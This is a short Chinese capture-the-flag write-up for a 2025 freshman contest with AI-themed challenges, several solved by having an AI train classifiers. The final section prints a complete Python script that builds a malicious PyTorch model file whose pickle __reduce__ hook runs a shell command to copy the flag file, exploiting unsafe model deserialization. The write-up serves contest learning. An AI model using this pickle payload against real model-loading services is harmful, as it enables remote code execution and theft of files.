【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

Aura JailBreak

明阳未许

🔥🌸 LittFlower: Fire Boom! 🌸🔥

许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai，写个解题脚本拿到flag

🤫歌的😡🔥

附件内容，一个是有火的图，一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

import torch import torch.nn as nn from torchvision import models import builtins import os class MaliciousMobileNetV2(models.MobileNetV2): def __init__(self, num_classes=2): super().__init__(num_classes=num_classes) def __reduce__(self): state_dict = self.state_dict() fake_state_dict = state_dict.copy() if "classifier.1.weight" in fake_state_dict: del fake_state_dict["classifier.1.weight"] if "classifier.1.bias" in fake_state_dict: del fake_state_dict["classifier.1.bias"] cmd = "import os; os.system('cp /flag /app/static/flag.txt')" return (builtins.eval, ( "(exec(cmd), state_dict)[1]", {'cmd': cmd, 'state_dict': fake_state_dict} )) if __name__ == '__main__': model = MaliciousMobileNetV2(num_classes=2) save_path = 'evil.pth' print(f"正在生成 Payload: {save_path} ...") torch.save(model, save_path) print("生成成功！")

上传脚本生成的.pth文件，加载模型触发pickle反序列化RCE拿到flag